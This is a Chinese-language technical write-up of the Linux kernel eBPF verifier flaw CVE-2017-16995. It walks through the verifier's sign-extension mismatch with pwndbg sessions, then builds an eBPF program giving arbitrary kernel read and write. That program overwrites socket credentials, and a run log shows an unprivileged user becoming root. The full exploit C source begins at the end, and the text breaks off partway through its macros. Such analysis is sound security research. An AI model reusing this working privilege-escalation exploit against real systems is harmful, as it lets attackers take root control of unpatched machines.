Ubuntu kernel eBPF(CVE-2017-16995)

Ubuntu kernel eBPF(CVE-2017-16995)

前言

关于这个漏洞网上已经有很多相关原理的分析,但大多主要以Vitaly Nikolenko的exp来分析,其中涉及了对exp中ebpf字节码进行逆向的问题,对于分析漏洞利用过程并不是十分直观。本篇文章以Bruce Leidl的exp进行分析,个人认为相比前者流程更加清晰直观,便于理解。

环境搭建

本次复现使用Linux_kernel-4.4.33,在编译前开启CONFIG_BPF 和CONFIG_DEBUG_INFO。

extended BPF

eBPF(extended Berkeley Packet Filter)是内核源自于BPF的一套包过滤机制,eBPF的功能已经不仅仅局限于网络包过滤,利用它可以实现kernel tracing,tracfic control,应用性能监控等强大功能。eBPF提供了一套类似RISC指令集,并实现了该指令集的虚拟机,使用者通过内核API向eBPF提交指令代码来完成特定的功能。

eBPF虚拟指令系统属于RISC,拥有10个虚拟寄存器,r0-r10,在实际运行时,虚拟机会把这10个寄存器一 一对应于硬件CPU的10个物理寄存器,以x64为例,对应关系如下:

    //R0 - 保存返回值
    //R1-R5 参数传递
    //R6-R9 保存临时变量
    //R10 只读,用做栈指针
    R0 – rax
    R1 - rdi
    R2 - rsi
    R3 - rdx
    R4 - rcx
    R5 - r8
    R6 - rbx
    R7 - r13
    R8 - r14
    R9 - r15
    R10 – rbp(帧指针,frame pointer)

每一条指令的格式如下:

//source/include/uapi/linux/bpf.h#L58
struct bpf_insn {
	__u8	code;		/* opcode */
	__u8	dst_reg:4;	/* dest register */
	__u8	src_reg:4;	/* source register */
	__s16	off;		/* signed offset */
	__s32	imm;		/* signed immediate constant */
};

例如BPF指令:BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF)其数据结构为:

//source/include/linux/filter.h#L124
#define BPF_MOV32_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

转换成字节码为:\xb4\x09\x00\x00\xff\xff\xff\xff

可通过如下程序对eBPF字节码进行转换:

[1]https://github.com/dangokyo/CVE_2017_16995/blob/master/disassembler.c

[2]https://github.com/ret2p4nda/kernel-pwn/blob/master/CVE-2017-16995/epbf_tools.py

漏洞分析

简单来说漏洞点是在BPF模拟执行检测时的代码实现和实际运行时的代码实现不同,导致了经过构造的BPF指令绕过检测从而执行恶意代码。

verifier机制绕过

eBPF检测时(do_check() )

我们首先来看如何绕过eBPF的verifier机制,exp中代码如下:

#define BPF_DISABLE_VERIFIER()                                                      \
	BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),            /* r2 = (u32)0xFFFFFFFF   */   \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),  /* if (r2 == -1) {        */   \
	BPF_MOV64_IMM(BPF_REG_0, 0),                     /*   exit(0);             */   \
	BPF_EXIT_INSN()                                  /* }                      */   \

第一行的eBPF操作码为BPF_ALU | BPF_MOV | BPF_K,verifier 会对ALU指令用check_alu_op函数进行检查。

该函数调用路径为:

#0  0xffffffff8116719b in check_alu_op (insn=<optimized out>, env=<optimized out>) at kernel/bpf/verifier.c:1097
#1  do_check (env=<optimized out>) at kernel/bpf/verifier.c:1765
#2  bpf_check (prog=<optimized out>, attr=<optimized out>) at kernel/bpf/verifier.c:2258
#3  0xffffffff81163d4e in bpf_prog_load (attr=0xffff88000d94fef0) at kernel/bpf/syscall.c:679
#4  0xffffffff8116456e in SYSC_bpf (size=48, uattr=<optimized out>, cmd=<optimized out>) at kernel/bpf/syscall.c:783
#5  SyS_bpf (cmd=5, uattr=140726845938864, size=72) at kernel/bpf/syscall.c:725
#6  0xffffffff817ef672 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:185

该函数最后一个else是将立即数赋值给寄存器,然而其并没有对BPF_ALU64|BPF_MOV|BPF_KBPF_ALU|BPF_MOV|BPF_K两个指令做区分。直接把用户指令中的立即数insn->imm赋值给了目的寄存器,insn->imm和目的寄存器的类型都是int。

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
 RAX  0x90
 RBX  0xffff88000d950018 ◂— 0
 RCX  0x0
 RDX  0xffffffff
 RDI  0xffff88000d950018 ◂— 0
 RSI  0xffff88000d9500a8 ◂— 8
 R8   0xa
 R9   0xfffc
 R10  0xb
 R11  0xffffc9000009301b ◂— 0xa /* '\n' */
 R12  0x0
 R13  0xffffc90000002028 ◂— 0xffffffff000009b4
 R14  0xb0
 R15  0xffff88000d950000 —▸ 0xffffc90000002000 ◂— 0x2900020001
 RBP  0xffff88000d94fe18 —▸ 0xffff88000d94fed0 —▸ 0xffff88000d94ff48 —▸ 0x7ffd85a99d00 —▸ 0x7ffd85a99d10 ◂— ...
 RSP  0xffff88000d94fd90 ◂— 0xffffffff
 RIP  0xffffffff8116719b (bpf_check+6715) ◂— 0xca870ffffff237e9
──────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
   0xffffffff81167187 <bpf_check+6695>    movzx  eax, byte ptr [r13 + 1]
   0xffffffff8116718c <bpf_check+6700>    mov    edx, dword ptr [r13 + 4]
   0xffffffff81167190 <bpf_check+6704>    and    eax, irq_stack_union+15 <15>
   0xffffffff81167193 <bpf_check+6707>    shl    rax, 4 <4>
   0xffffffff81167197 <bpf_check+6711>    mov    dword ptr [rbx + rax + 8], edx
 ► 0xffffffff8116719b <bpf_check+6715>    jmp    bpf_check+3191 <0xffffffff811663d7>
    ↓
   0xffffffff811663d7 <bpf_check+3191>    add    r12d, 1
   0xffffffff811663db <bpf_check+3195>    jmp    bpf_check+2633 <0xffffffff811661a9>
    ↓
   0xffffffff811661a9 <bpf_check+2633>    cmp    dword ptr [rsp + 0x38], r12d
   0xffffffff811661ae <bpf_check+2638>    jle    bpf_check+6091 <0xffffffff81166f2b>
 
   0xffffffff811661b4 <bpf_check+2644>    mov    rax, qword ptr [rsp + 0x30]
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/verifier.c
   1091 			}
   1092 		} else {
   1093 			/* case: R = imm
   1094 			 * remember the value we stored into this reg
   1095 			 */
   1096 			regs[insn->dst_reg].type = CONST_IMM;
 ► 1097 			regs[insn->dst_reg].imm = insn->imm;
   1098 		}
   1099 
   1100 	} else if (opcode > BPF_END) {
   1101 		verbose("invalid BPF_ALU opcode %x\n", opcode);
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp  0xffff88000d94fd90 ◂— 0xffffffff
01:0008│      0xffff88000d94fd98 ◂— jnp    0xffff88000d94fd3c /* 0xa27b */
02:0010│      0xffff88000d94fda0 ◂— 0x95
03:0018│      0xffff88000d94fda8 ◂— 0
04:0020│      0xffff88000d94fdb0 ◂— add    byte ptr [rax], al /* 0x800000000000 */
05:0028│      0xffff88000d94fdb8 —▸ 0x6be540 ◂— 0
06:0030│      0xffff88000d94fdc0 —▸ 0xffffc90000002028 ◂— 0xffffffff000009b4
07:0038│      0xffff88000d94fdc8 —▸ 0xffff880000000029 ◂— xlatb   /* 0x1ef000d71ef000d7 */
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
 ► f 0 ffffffff8116719b bpf_check+6715
   f 1 ffffffff8116719b bpf_check+6715
   f 2 ffffffff8116719b bpf_check+6715
   f 3 ffffffff81163d4e bpf_prog_load+590
   f 4 ffffffff8116456e sys_bpf+846
   f 5 ffffffff8116456e sys_bpf+846
   f 6 ffffffff817ef672 entry_SYSCALL_64+98
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/10wx $rbx+$rax
0xffff88000d9500a8:	0x00000008	0x00000000	0xffffffff	0x00000000
0xffff88000d9500b8:	0x00000006	0x00000000	0x00000000	0x00000000
0xffff88000d9500c8:	0x00000000	0x00000000

$rbx+$raxreg_state结构体类型的reg值,可见第一个字段值为8,第二个字段值为0xffffffff。结构体定义如下:

//kernel/bpf/verifier.c
struct reg_state {
    enum bpf_reg_type type;
    union {
        /* valid when type == CONST_IMM | PTR_TO_STACK */
        int imm;
        /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
         *   PTR_TO_MAP_VALUE_OR_NULL
         */
        struct bpf_map *map_ptr;
    };
};
//declaration of regs
struct reg_state *regs = state->regs

可以看到该结构体有2个字段,第一个为type,代表寄存器数据的类型,此处为CONST_IMMCONST_IMM的值为8.另外一个为常量立即数的具体数值,可以看到类型为有符号整形。

do_check()在校验条件类跳转指令的时候,会判断条件是否成立,如果是非确定性跳转的话,就说明接下来2个分支都有可能执行(分支1和分支2),这时do_check()会把下一步需要跳转到的指令编号(分支2)放到一个临时栈中备用,这样当前指令顺序校验(分支1)过程中遇到EXIT指令时,会从临时栈中取出之前保存的下一条指令的序号(分支2)继续校验。如果跳转指令恒成立的话(即直通分支, fall-through branch ),就不会再往临时栈中放入分支2,因为分支2永远不会执行

下面这段代码是对BPF_JMP|BPF_JNE|BPF_IMM指令进行检查,这条指令的语义是:如果目的寄存器立即数==指令的立即数(insn->imm),程序继续执行,否则执行pc+off处的指令;注意判断立即数相等的条件,因为前面ALU指令对32bit和64bit integer不加区分,不论imm是否有符号,在这里都是相等的。

//kernel/bpf/verifier.c#L1248
static int check_cond_jmp_op(struct verifier_env *env,
			     struct bpf_insn *insn, int *insn_idx)
{
	struct reg_state *regs = env->cur_state.regs;
	struct verifier_state *other_branch;
	u8 opcode = BPF_OP(insn->code);
	int err;
    
    ...
        
	/* detect if R == 0 where R was initialized to zero earlier */
	if (BPF_SRC(insn->code) == BPF_K &&
	    (opcode == BPF_JEQ || opcode == BPF_JNE) &&
	    regs[insn->dst_reg].type == CONST_IMM &&
	    regs[insn->dst_reg].imm == insn->imm) {
		if (opcode == BPF_JEQ) {
			/* if (imm == imm) goto pc+off;
			 * only follow the goto, ignore fall-through
			 */
			*insn_idx += insn->off;
			return 0;
		} else {
			/* if (imm != imm) goto pc+off;
			 * only follow fall-through branch, since
			 * that's where the program will go
			 */
			return 0;
		}
	}
    other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
    ...
}

下面代码,是在校验EXIT指令时,会从临时栈中尝试取指令(调用pop_stack()函数),如果临时栈中有指令,那就说明还有其他可能执行到的分支,需要继续校验,如果取不到值,表示当前这条EXIT指令确实是BPF程序最后一条可以执行到的指令,此时pop_stack()会返回-1,然后跳出do_check校验循环,do_check执行结束,校验通过。

//kernel/bpf/verifier.c#L1921
else if (class == BPF_JMP) {
    u8 opcode = BPF_OP(insn->code);
    ...
    } else if (opcode == BPF_EXIT) {
        if (BPF_SRC(insn->code) != BPF_K ||
            insn->imm != 0 ||
            insn->src_reg != BPF_REG_0 ||
            insn->dst_reg != BPF_REG_0) {
            verbose("BPF_EXIT uses reserved fields\n");
            return -EINVAL;
        }

        /* eBPF calling convetion is such that R0 is used
				 * to return the value from eBPF program.
				 * Make sure that it's readable at this time
				 * of bpf_exit, which means that program wrote
				 * something into it earlier
				 */
        err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
        if (err)
            return err;

        if (is_pointer_value(env, BPF_REG_0)) {
            verbose("R0 leaks addr as return value\n");
            return -EACCES;
        }
process_bpf_exit:
        insn_idx = pop_stack(env, &prev_insn_idx);
        if (insn_idx < 0) {
            break;
        } else {
            do_print_state = true;
            continue;
        }
    } 
	...
}

eBPF运行时(_bpf_prog_run() )

运行第一行操作指令时,将操作码BPF_ALU | BPF_MOV | BPF_K对应为ALU_MOV_K。而64位的操作码BPF_ALU64|BPF_MOV|BPF_K对应为ALU64_MOV_K,定义代码如下:

//kernel/bpf/core.c
static const void *jumptable[256] = {
		[0 ... 255] = &&default_label,
		...
		[BPF_ALU | BPF_MOV | BPF_K] = &&ALU_MOV_K,
		...
		[BPF_ALU64 | BPF_MOV | BPF_K] = &&ALU64_MOV_K,
		...
	};
	...
	ALU_MOV_K:
		DST = (u32) IMM;
		CONT;
	...
	ALU64_MOV_K:
		DST = IMM;
		CONT;

可以看出verifier检测时和eBPF运行时代码对于2条指令的语义解释并不一样,DST是64位寄存器,因此ALU_MOV_K得到的是一个32位的无符号整数,而ALU64_MOV_K会对imm进行符号扩展,得到一个64位有符号整数。

eBPF运行时对BPF_JMP|BPF_JNE|BPF_K指令的解释

JMP_JNE_K:
		if (DST != IMM) {
			insn += insn->off;
			CONT_JMP;
		}
		CONT;

imm为有符号和无符号时,由于符号扩展,DST!=IMM结果是不一样的。

动态调试结果如下,可见实际执行时与模拟执行时跳转结果相反,最终执行了verifier未检查的eBPF代码。从而绕过了verifier检测机制。

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
 RAX  0x9
 RBX  0xffffc90000002030 ◂— 0xffffffff00020955
 RCX  0x0
 RDX  0xffffffffffffffff
 RDI  0xffff88000d961300 ◂— 0
 RSI  0xffffffff
 R8   0x0
 R9   0x0
 R10  0x0
 R11  0xffff88000d929000 ◂— 0
 R12  0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748
 R13  0x0
 R14  0xffff88000d928c00 ◂— 0
 R15  0xffff88000d94fdf0 ◂— 0
 RBP  0xffff88000d94fce0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ...
 RSP  0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000
 RIP  0xffffffff81162d2c (__bpf_prog_run+2028) ◂— 0xfffffd90c5943948
───────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
   0xffffffff811631d0 <__bpf_prog_run+3216>    movzx  eax, byte ptr [rbx]
   0xffffffff811631d3 <__bpf_prog_run+3219>    jmp    qword ptr [r12 + rax*8]
    ↓
   0xffffffff81162d21 <__bpf_prog_run+2017>    movzx  eax, byte ptr [rbx + 1]
   0xffffffff81162d25 <__bpf_prog_run+2021>    movsxd rdx, dword ptr [rbx + 4]
   0xffffffff81162d29 <__bpf_prog_run+2025>    and    eax, irq_stack_union+15 <15>
 ► 0xffffffff81162d2c <__bpf_prog_run+2028>    cmp    qword ptr [rbp + rax*8 - 0x270], rdx
   0xffffffff81162d34 <__bpf_prog_run+2036>    je     __bpf_prog_run+4992 <0xffffffff811638c0>
 
   0xffffffff81162d3a <__bpf_prog_run+2042>    movsx  rax, word ptr [rbx + 2]
   0xffffffff81162d3f <__bpf_prog_run+2047>    lea    rbx, [rbx + rax*8 + 8]
   0xffffffff81162d44 <__bpf_prog_run+2052>    movzx  eax, byte ptr [rbx]
   0xffffffff81162d47 <__bpf_prog_run+2055>    jmp    qword ptr [r12 + rax*8]
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c
   491 			insn += insn->off;
   492 			CONT_JMP;
   493 		}
   494 		CONT;
   495 	JMP_JNE_K:
 ► 496 		if (DST != IMM) {
   497 			insn += insn->off;
   498 			CONT_JMP;
   499 		}
   500 		CONT;
   501 	JMP_JGT_X:
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp  0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000
01:0008│      0xffff88000d94fa70 ◂— 0
02:0010│      0xffff88000d94fa78 —▸ 0xffff88000d961300 ◂— 0
03:0018│      0xffff88000d94fa80 ◂— 0
04:0020│      0xffff88000d94fa88 —▸ 0xffff88000fd5c8d8 ◂— 0xffff88000fd5c8d8
05:0028│      0xffff88000d94fa90 —▸ 0xffff88000fa1a208 —▸ 0xffffea000006f460 —▸ 0xffffea000006f420 —▸ 0xffffea000006f3e0 ◂— ...
06:0030│      0xffff88000d94fa98 —▸ 0xffff88000fd5c780 ◂— 0x1c4
07:0038│      0xffff88000d94faa0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ...
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
 ► f 0 ffffffff81162d2c __bpf_prog_run+2028
   f 1 ffffffff81700a1b sk_filter+91
   f 2 ffffffff81700a1b sk_filter+91
   f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501
   f 4 ffffffff816cec48 sock_sendmsg+56
   f 5 ffffffff816cec48 sock_sendmsg+56
   f 6 ffffffff816cece2 sock_write_iter+130
   f 7 ffffffff811f7f09 __vfs_write+169
   f 8 ffffffff811f7f09 __vfs_write+169
   f 9 ffffffff811f8556 vfs_write+150
   f 10 ffffffff811f9156 sys_write+70
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/wx $rbp+$rax*8-0x270
0xffff88000d94fab8:	0xffffffff
pwndbg> i r $rdx
rdx            0xffffffffffffffff	-1

组装eBPF指令

在绕过verifier检测机制后,需要组装一个eBPF指令用来做任意地址的读写。

首先来看exp中的实现,如下:

#define BPF_DISABLE_VERIFIER()                                                       \
	BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),             /* r2 = (u32)0xFFFFFFFF   */   \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),   /* if (r2 == -1) {        */   \
	BPF_MOV64_IMM(BPF_REG_0, 0),                      /*   exit(0);             */   \
	BPF_EXIT_INSN()                                   /* }                      */   \

#define BPF_MAP_GET(idx, dst)                                                        \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),              /* r1 = r9                */   \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),             /* r2 = fp                */   \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),            /* r2 = fp - 4            */   \
	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),           /* *(u32 *)(fp - 4) = idx */   \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),             \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),            /* if (r0 == 0)           */   \
	BPF_EXIT_INSN(),                                  /*   exit(0);             */   \
	BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0)          /* r_dst = *(u64 *)(r0)   */              

static int load_prog() {
	struct bpf_insn prog[] = {
		BPF_DISABLE_VERIFIER(),

		BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16),   /* *(fp - 16) = r1       */

		BPF_LD_MAP_FD(BPF_REG_9, mapfd),                   /* r9 = mapfd            */
            
        //可以看出这个MAP的第一个元素为操作指令,第二个元素为需要读写的内存地址,第三个元素用来存放读取到的内容。
		BPF_MAP_GET(0, BPF_REG_6),                         /* r6 = op               */
		BPF_MAP_GET(1, BPF_REG_7),                         /* r7 = address          */
		BPF_MAP_GET(2, BPF_REG_8),                         /* r8 = value            */

		/* store map slot address in r2 */
		BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0               */
		BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0  for exit(0)   */

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2),             /* if (op == 0)          */
		/* get fp */
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),
		BPF_EXIT_INSN(),

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),             /* else if (op == 1)     */
		/* get skbuff */
		BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16),
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
		BPF_EXIT_INSN(),

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3),             /* else if (op == 2)     */
		/* read */
		BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0),
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
		BPF_EXIT_INSN(),
		/* else                  */
		/* write */
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), 
		BPF_EXIT_INSN(),

	};
	return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}

之前已经分析过BPF_DISABLE_VERIFIER()的行为,继续往下分析。

首先将rax存入rbp - 0x220处,此处为exp中fp的值。将rdi存入rbp-0x268处,此处为exp中BPF_REG_1的值,并且rdi在源码中的定义为struct sk_buff * skb,这为后面覆写skb->sk->sk_peer_cred提权做铺垫。

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
 RAX  0xb4
 RBX  0xffffc90000002028 ◂— 0xffffffff000002b4
 RCX  0x0
 RDX  0xffff88000d9fc800 ◂— 0
 RDI  0xffff88000da0e800 ◂— 0
 RSI  0xffffc90000002028 ◂— 0xffffffff000002b4
 R8   0x0
 R9   0x0
 R10  0x0
 R11  0xffff88000d9fc800 ◂— 0
 R12  0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748
 R13  0x0
 R14  0xffff88000d9fc400 ◂— 0
 R15  0xffff88000da0bdf0 ◂— 0
 RBP  0xffff88000da0bce0 —▸ 0xffff88000da0bd20 —▸ 0xffff88000da0bdc0 —▸ 0xffff88000da0bde0 —▸ 0xffff88000da0be50 ◂— ...
 RSP  0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000
 RIP  0xffffffff81162577 (__bpf_prog_run+55) ◂— 0xfffffd9085c748
───────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
   0xffffffff8116255c <__bpf_prog_run+28>      xor    r13d, r13d
   0xffffffff8116255f <__bpf_prog_run+31>      sub    rsp, irq_stack_union+608 <0x260>
   0xffffffff81162566 <__bpf_prog_run+38>      mov    qword ptr [rbp - 0x220], rax
   0xffffffff8116256d <__bpf_prog_run+45>      movzx  eax, byte ptr [rsi]
   0xffffffff81162570 <__bpf_prog_run+48>      mov    qword ptr [rbp - 0x268], rdi
 ► 0xffffffff81162577 <__bpf_prog_run+55>      mov    qword ptr [rbp - 0x270], 0
   0xffffffff81162582 <__bpf_prog_run+66>      mov    qword ptr [rbp - 0x238], 0
   0xffffffff8116258d <__bpf_prog_run+77>      jmp    qword ptr [r12 + rax*8]
    ↓
   0xffffffff811631ba <__bpf_prog_run+3194>    movzx  eax, byte ptr [rbx + 1]
   0xffffffff811631be <__bpf_prog_run+3198>    mov    esi, dword ptr [rbx + 4]
   0xffffffff811631c1 <__bpf_prog_run+3201>    add    rbx, 8 <8>
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c
   305 
   306 	FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)];
   307 	ARG1 = (u64) (unsigned long) ctx;
   308 
   309 	/* Registers used in classic BPF programs need to be reset first. */
 ► 310 	regs[BPF_REG_A] = 0;
   311 	regs[BPF_REG_X] = 0;
   312 
   313 select_insn:
   314 	goto *jumptable[insn->code];
   315 
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp  0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000
01:0008│      0xffff88000da0ba70 ◂— 0
02:0010│      0xffff88000da0ba78 —▸ 0xffff88000da0e800 ◂— 0
03:0018│      0xffff88000da0ba80 —▸ 0xffff88000d96c770 ◂— 0
04:0020│      0xffff88000da0ba88 —▸ 0xffff88000da0e800 ◂— 0
05:0028│      0xffff88000da0ba90 ◂— 0x158
06:0030│      0xffff88000da0ba98 —▸ 0xffff88000fd07e00 —▸ 0xffff88000fd06780 ◂— 0x1c4
07:0038│      0xffff88000da0baa0 ◂— 1
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
 ► f 0 ffffffff81162577 __bpf_prog_run+55
   f 1 ffffffff81700a1b sk_filter+91
   f 2 ffffffff81700a1b sk_filter+91
   f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501
   f 4 ffffffff816cec48 sock_sendmsg+56
   f 5 ffffffff816cec48 sock_sendmsg+56
   f 6 ffffffff816cece2 sock_write_iter+130
   f 7 ffffffff811f7f09 __vfs_write+169
   f 8 ffffffff811f7f09 __vfs_write+169
   f 9 ffffffff811f8556 vfs_write+150
   f 10 ffffffff811f9156 sys_write+70
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/gx $rbp-0x220
0xffff88000da0bac0:	0xffff88000da0bcc8
pwndbg> x/gx 0xffff88000da0bcc8
0xffff88000da0bcc8:	0xffff88000da0e800
pwndbg> x/gx $rbp-0x268
0xffff88000da0ba78:	0xffff88000da0e800

BPF_MAP_GET的主要流程为:将mapfd放到r9;将r9放到r1,作为后续调用BPF_FUNC_map_lookup_elem函数的第一个参数;将fp赋值给r2;在栈上开辟4个字节的空间;将MAP元素的序号(idx)放到r2;取map中第r2个元素的值调用BPF_FUNC_map_lookup_elem并把返回值存入r0;判断BPF_FUNC_map_lookup_elem是否执行成功;成功后执行第9条指令,将取到的值放到目标寄存器(dst)中。

后面定义了四个命令:1.获取fp内核栈地址。2.获取sk_buff地址。3.任意地址读。4.任意地址写。

提权

覆写sk中的sk_peer_cred使其内部与uid相关值置0。由于每个内核版本sk_peer_cred偏移不同,可以先搜索sk_rcvtimeo = 9223372036854775807找到其偏移再减8即为sk_peer_cred的偏移。

pwndbg> p *((struct sk_buff *)0xffff88000da0e800)
$1 = {
  {
    {
      next = 0x0 <irq_stack_union>, 
      prev = 0x0 <irq_stack_union>, 
      {
        tstamp = {
          tv64 = 0
        }, 
        skb_mstamp = {
          {
            v64 = 0, 
            {
              stamp_us = 0, 
              stamp_jiffies = 0
            }
          }
        }
      }
    }, 
    rbnode = {
      __rb_parent_color = 0, 
      rb_right = 0x0 <irq_stack_union>, 
      rb_left = 0x0 <irq_stack_union>
    }
  }, 
  sk = 0xffff88000d9fc400, 
  ...
}
pwndbg> p *((struct sock*)0xffff88000d9fc400)
$2 = {
  ...
  sk_peer_pid = 0xffff88000d96cd00, 
  sk_peer_cred = 0xffff88000d9f9c00, 
  sk_rcvtimeo = 9223372036854775807, 
  sk_sndtimeo = 9223372036854775807, 
  ...
}

运行结果:

/ $ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
/ $ ./get-rekt-linux-hardened
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
uid:3e8
[*] Leaking skbuff addr from ffff88000d9f9400
[*] Leaking sock struct from ffff88000da16400
[*] found sock->sk_rcvtimeo at offset 472
[*] found sock->sk_peer_cred
[*] hammering cred structure at ffff88000da10780
[*] credentials patched, launching shell...
/ # id
uid=0(root) gid=0(root) groups=1000(ctf)

EXP

完整exp如下:

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>

char buffer[64];
int sockets[2];
int mapfd, progfd;
int doredact = 0;

#define LOG_BUF_SIZE 65536
char bpf_log_buf[LOG_BUF_SIZE];

static __u64 ptr_to_u64(void *ptr)
{
	return (__u64) (unsigned long) ptr;
}

int bpf_prog_load(enum bpf_prog_type prog_type,
		  const struct bpf_insn *insns, int prog_len,
		  const char *license, int kern_version)
{
	union bpf_attr attr = {
		.prog_type = prog_type,
		.insns = ptr_to_u64((void *) insns),
		.insn_cnt = prog_len / sizeof(struct bpf_insn),
		.license = ptr_to_u64((void *) license),
		.log_buf = ptr_to_u64(bpf_log_buf),
		.log_size = LOG_BUF_SIZE,
		.log_level = 1,
	};

	attr.kern_version = kern_version;

	bpf_log_buf[0] = 0;

	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
		   int max_entries, int map_flags)
{
	union bpf_attr attr = {
		.map_type = map_type,
		.key_size = key_size,
		.value_size = value_size,
		.max_entries = max_entries
	};

	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags)
{
	union bpf_attr attr = {
		.map_fd = fd,
		.key = ptr_to_u64(key),
		.value = ptr_to_u64(value),
		.flags = flags,
	};

	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

int bpf_lookup_elem(int fd, void *key, void *value)
{
	union bpf_attr attr = {
		.map_fd = fd,
		.key = ptr_to_u64(key),
		.value = ptr_to_u64(value),
	};

	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

#define BPF_ALU64_IMM(OP, DST, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_MOV64_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_MOV32_REG(DST, SRC)					\
	((struct bpf_insn) {					\
